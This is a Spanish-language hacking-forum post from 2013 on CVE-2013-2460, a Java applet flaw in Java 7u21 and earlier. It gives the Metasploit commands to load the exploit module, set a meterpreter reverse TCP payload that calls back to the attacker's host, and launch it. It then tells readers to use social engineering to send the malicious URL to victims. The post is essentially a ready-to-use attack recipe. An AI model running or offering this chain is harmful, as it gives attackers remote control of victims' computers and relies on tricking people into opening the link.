elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  CVE-2013-2460
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: CVE-2013-2460  (Leído 2,367 veces)
Stuxnet

Desconectado Desconectado

Mensajes: 29



Ver Perfil WWW
CVE-2013-2460
« en: 2 Septiembre 2013, 03:46 am »


CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method

Este módulo de Metasploit abusa el método inseguro invoke()  de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.


Explotando CVE-2013-2460 con mestasploit:

// Cargamos el módulo

Código:
msf > use exploit/multi/browser/java_jre17_provider_skeleton

// Cargamos el payload para el meterpreter

msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp

msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]

msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]

msf exploit(java_jre17_provider_skeleton) > set uripath /

msf exploit(java_jre17_provider_skeleton) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Konami expulsa más de 300 jugadores de Pro Evolution Soccer 2013 - PES 2013 Xbox
Noticias
wolfbcn 0 3,506 Último mensaje 31 Enero 2013, 01:59 am
por wolfbcn
AVG 2013
Seguridad
vipamon 0 4,396 Último mensaje 2 Marzo 2013, 16:12 pm
por vipamon
[Sugerencia] Ehn-Dev 2013 « 1 2 »
Sugerencias y dudas sobre el Foro
0xDani 19 12,348 Último mensaje 8 Junio 2013, 14:45 pm
por OmarHack
Qué esperáis más del E3 2013
Juegos y Consolas
palo_tes 1 3,555 Último mensaje 1 Junio 2013, 21:17 pm
por DickGumshoe
CVE-2013-2465
Bugs y Exploits
Stuxnet 0 2,349 Último mensaje 2 Septiembre 2013, 03:44 am
por Stuxnet
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines